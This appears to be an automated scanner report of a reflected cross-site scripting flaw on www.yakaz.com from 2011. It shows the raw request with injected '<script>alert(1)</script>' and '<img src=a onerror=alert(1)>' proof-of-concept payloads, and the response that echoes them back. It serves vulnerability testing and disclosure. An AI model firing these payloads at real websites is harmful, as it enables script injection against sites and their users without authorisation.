1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.yakaz.com |
Path: | /favicon.ico |
GET /favicon.ico2cee5<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.yakaz.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 200 OK Server: Yakaz Web Server Date: Fri, 01 Apr 2011 11:40:22 GMT Content-Length: 95671 Content-Type: text/html; charset=utf-8 Set-Cookie: il=en; expires=Sat, 31-Mar-2012 11:40:22 GMT; path=/; domain=.yakaz.com Set-Cookie: YSID=ff42c454b83ae25 Set-Cookie: infos=deleted; expires=Thu, 01-Apr-2010 11:40:21 GMT; path=/; domain=.yakaz.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org xmlns:v="urn:schemas ...[SNIP]... <h1>Favicon.ico2cee5<img Src=a Onerror=alert(1) ...[SNIP]... |